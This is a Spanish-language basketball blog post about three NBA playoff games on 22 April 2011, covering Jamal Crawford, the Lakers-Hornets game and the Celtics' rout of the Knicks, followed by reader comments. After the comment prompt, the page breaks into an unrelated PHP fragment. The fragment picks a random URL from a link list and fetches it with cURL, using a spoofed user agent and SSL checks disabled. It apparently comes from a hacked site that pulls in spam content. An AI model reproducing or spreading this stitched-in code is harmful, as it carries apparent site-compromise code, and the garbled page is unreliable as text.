Playoffs (22/04/2011): Jamal VI, el gran halcón.

23 de April de 2011 por TheDeerHunter

Es la gran baza a disposición de Larry Drew en su serie. El arma secreta para doblegar a Dwight Howard. El espejo de las vergüenzas de Orlando.

El increíble triple de Crawford a tabla para matar el partido a falta de 5 segundos arrancaba la inmensa sonrisa de Dominique Wilkins como premio. Un último cuarto fabuloso con 12 de sus 23 puntos (18 en la segunda mitad) dirigiendo y mandando. Lo suyo no está siendo flor de un día. Es el máximo anotador de su equipo en esta serie. Sólo un jugador en la historia promedia mayor anotación saliendo desde el banco: Walter Davis para los Nuggets en 1989. 23.7 puntos por partido frente a los 17.3 que promedia el banquillo de Orlando al completo. Como decimos… el espejo de las vergüenzas y por ahí empieza a inclinarse la balanza.

Y eso que anoche, alrededor de Howard hubo algo más de chicha. 6 hombres, además de Supermán, rozaron o superaron las dobles figuras. El pívot es el primero desde Dirk Nowitzki en 2002 en promediar más de un 20-15 los tres primeros partidos y eso que sudó sangre con la dura defensa de Zaza Pachulia. El georgiano se muere por sacar a su par de sus casillas y anoche estuvo a punto de conseguirlo. Una caricia suya derivó en bronca, pero el expulsado rival fue Jason Richardso, el segundo mejor hombre de los Magic para desesperación de Van Gundy. La serie se pone 1-2 a falta de otra jornada en el Philips Arena.

Por su parte, los Lakers mejoraron su imagen y recuperaron ventaja ante las miles camisetas amarillas del Arena de New Orleans. En el 80º partido de más de 30 puntos de Kobe en los Playoffs, Gasol se reencontró a si mismo. Sin deslumbrar, duplicó sus promedios de los dos primeros partidos y se unió a Bynum&Odom para, por fin en esta serie, imponer claramente el superior juego interior angelino. Si los Lakers parecen haberse librado de la presión defensiva de los Hornets estos confirman su preocupante perspectiva ofensiva, con grandes dificultades para superar los 90 puntos. Con el banco a su nivel habitual lo tienen muy complicado. CP3 volvió a matarse por sacar esto adelante y recibió una gran ayuda de Landry y Okafor. No es suficiente.

Por último, en la Gran Manzana, tantos años llevaban esperando volver a asistir a un partido de postemporada para llevarse un palizón como el que les dieron los Celtics anoche. Stat estuvo pero no estuvo y a Melo le tocó la de arena en esta serie. Pierce les hizo un destrozo de 38 puntos, Allen sumó 32 y Rondo consiguió un triple doble. D’Antoni pudo ofrecer minutos de la basura a sus menos habituales para reservar de cara al próximo, donde se dice estará Shaq en frente y donde no hay nadie que apueste por otra cosa que no sea un 4-0 para los Celtics.

PREMIOS:

MVP: Los Celtics funcionaron como un reloj. Paul Pierce, 38 puntos, Ray Allen, 32 con 8 triples y Rajon Rondo, 15 puntos, 11 rebotes y 20 asistencias. Imposible darle el premio a uno solo.

Sorpresa: Anoche el mejor de los Knicks no fue Carmelo ni Amare, sinó Shawne Williams que aprovechó sus minutos con 17 puntos, 6 rebotes, 2 robos y 2 tapones.

Decepción: Habrá que preguntarle a Amare Stoudamire si está contento con la llegada de Carmelo. De cara al año que viene, los Knicks deberán estudiar la manera de poder aprovechar el talento de ambos jugadores y no olvidar al ala-pívot. Anoche, se quedó en 7 puntos y 3 rebotes. Demasiado poco a pesar de los problemas físicos.

Esfuerzo en vano: Como siempre, Chris Paul fue el que más luchó frente las hordas amarillas. Sus 22 puntos, 5 rebotes y 8 asistencias se disolvieron como un azucarillo.

Comenta

5 comentarios a esta entrada

  1. Antoine Doinel dice:
    #1

    Pobres Knicks. Ayer Allen y Pierce tenían un imán, les entraba absolutamente todo, y ante eso poco se puede hacer. Ayudó, eso sí, el bajo nivel defensivo que mostraron, excepto quizás en partes del segundo cuarto.

    Y pese a la paliza, es preocupante el bajo nivel del banquillo de los celtics. Ayer, 13 puntos (9 Green, 4 Davis) y para de contar, y eso que disfrutaron de minutos basura para ampliar sus registros. Glen Davis es clave para este equipo como sexto hombre, si no se recupera lo veo muy negro, aunque Jermaine y Green están cumpliendo. Veremos como vuelve Shaq!

    Y los Lakers, qué vagos son. Perfectamente podrían solucionar su serie 4-0 aplicándose un poco, pero no me extrañaría que se fueran al 4-2 mínimo.

      Citar

  2. JHC dice:
    #2

    Una victoria para mis Hawks vamos k podemos

      Citar

  3. Nacho dice:
    #3

    Impresionante Rondo. Si hay alguien por quién pagaría por ver jugar es él. Y eso que juega con los jodidos verdes, pero el cabrón encarna, las para mí, claves de este maravilloso juego. Visión del mismo, tensión competitiva y juego en EQUIPO. Y encima haciéndolo atractivo para cualquier espectador. Si alguien no ha visto un partido de basket en su vida, seguro que disfrutará con este tío.

      Citar

  4. KB #24 dice:
    #4

    Zaza es georgiano! y diria que le hechó muchos huevos para intentar minimizar el tornado howard. ¿Cómo es que no lo defiende hordford?

      Citar

  5. JHC dice:
    #5

    Horford es muy pequeño y se cargaria muy rápida de faltas por lo k Larry lo pone de ala-pivot y pone a jason o Zaza para parar a Howard

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>